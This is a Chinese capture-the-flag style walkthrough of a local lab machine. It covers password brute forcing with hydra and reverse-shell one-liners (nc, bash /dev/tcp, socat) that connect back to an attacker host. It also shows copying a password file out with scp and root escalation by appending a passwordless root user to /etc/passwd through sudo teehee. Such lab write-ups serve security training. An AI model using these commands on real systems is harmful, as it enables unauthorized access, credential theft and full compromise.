1. 信息搜集
扫描网段发现主机 192.168.163.135
nmap扫描端口,发现http和ssh端口
访问网站尝试登录失败,目录扫描无重要内容,尝试爆破
2. 渗透测试
2.1. 登录密码爆破
bp抓包查看数据格式,可用bp爆破或 hydra
爆破
使用 hydra
爆破
1
hydra 192.168.163.135 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
获取到密码:happy,登录发现命令执行页面,抓包测试发现存在漏洞
2.2. 反弹shell
上传反弹shell命令
1
2
3
4
5
nc -nv 192.168.163.135 -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -nv 192.168.163.132 4444 > /tmp/f
bash -i >& /dev/tcp/192.168.163.132/4444 0>&1
ncat -nv 192.168.163.132 4444 -e /bin/bash
socat TCP:192.168.163.132:4444 EXEC:/bin/bash
连接成功
查看home目录,发现jim用户下 old-passwords.bak
文件
直接复制或使用scp传给kali,kali需要开启SSH服务,允许密码登录
1
2
3
scp -P 2233 old-passwords.bak kali@192.168.163.132:~
# -P 2233 指定SSH端口2233
# :~ 将文件放到目标机用户家目录
2.3. SSH爆破
使用 hydra
爆破SSH
1
hydra 192.168.163.135 -l jim -P old-passwords.bak ssh
密码:jibril04,su jim
切换用户成功,查看mbox文件发现是邮件,查找是否有其他邮件
在 /var/mail
目录下发现邮件,其中有charles发送给jim的密码邮件
用户名:charles
注意是小写
密码: ^xHhA&hvim0y
su charles
切换用户成功后,查看用户目录下无内容,sudo -l
尝试提权
2.4. 提权
teehee提权
1
2
echo "shell::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su shell